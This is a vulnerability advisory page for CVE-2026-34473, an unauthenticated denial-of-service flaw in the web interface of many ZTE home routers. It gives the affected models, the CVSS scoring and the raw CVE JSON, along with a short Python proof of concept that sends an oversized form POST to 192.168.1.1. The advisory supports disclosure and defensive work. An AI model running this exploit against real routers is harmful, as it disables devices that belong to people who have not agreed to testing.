Security Vulnerability Report
中文
CVE-2026-34473 CVSS 7.5 HIGH

CVE-2026-34473

Published: 2026-05-06 19:16:36
Last Modified: 2026-05-07 15:15:07
Source: [email protected]

Description

Unauthenticated DoS in ZTE H8102E, H168N, H167A, H199A, H288A, H198A, H267A, H267N, H268A, H388X, H196A, H369A, H268N, H208N, H367N, H181A, and H196Q. A denial-of-service condition can be triggered against the router's web interface by sending an oversized application/x-www-form-urlencoded POST body. After triggering, the management interface may become unresponsive until the device is rebooted. This may affect any firmware version prior to 2022 (reporter observation). The supplier stated that devices are not vulnerable since 2021-03-23; operator firmware may vary.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

ZTE H8102E (2022年之前固件)
ZTE H168N (2022年之前固件)
ZTE H167A (2022年之前固件)
ZTE H199A (2022年之前固件)
ZTE H288A (2022年之前固件)
ZTE H198A (2022年之前固件)
ZTE H267A (2022年之前固件)
ZTE H267N (2022年之前固件)
ZTE H268A (2022年之前固件)
ZTE H388X (2022年之前固件)
ZTE H196A (2022年之前固件)
ZTE H369A (2022年之前固件)
ZTE H268N (2022年之前固件)
ZTE H208N (2022年之前固件)
ZTE H367N (2022年之前固件)
ZTE H181A (2022年之前固件)
ZTE H196Q (2022年之前固件)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL of the ZTE router web interface target_url = "http://192.168.1.1/" # Create a large payload to trigger the DoS # Sending an oversized application/x-www-form-urlencoded body large_payload = {"data": "A" * 100000} headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0" } try: print(f"Sending payload to {target_url}...") response = requests.post(target_url, data=large_payload, headers=headers, timeout=10) print(f"Response status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"Request failed: {e}") print("DoS trigger attempt completed.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34473", "sourceIdentifier": "[email protected]", "published": "2026-05-06T19:16:36.413", "lastModified": "2026-05-07T15:15:06.770", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unauthenticated DoS in ZTE H8102E, H168N, H167A, H199A, H288A, H198A, H267A, H267N, H268A, H388X, H196A, H369A, H268N, H208N, H367N, H181A, and H196Q. A denial-of-service condition can be triggered against the router's web interface by sending an oversized application/x-www-form-urlencoded POST body. After triggering, the management interface may become unresponsive until the device is rebooted. This may affect any firmware version prior to 2022 (reporter observation). The supplier stated that devices are not vulnerable since 2021-03-23; operator firmware may vary."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://gist.github.com/minanagehsalalma/7a8516b9b00d0008f2f25750320560c9", "source": "[email protected]"}, {"url": "https://www.zte.com.cn/global/", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.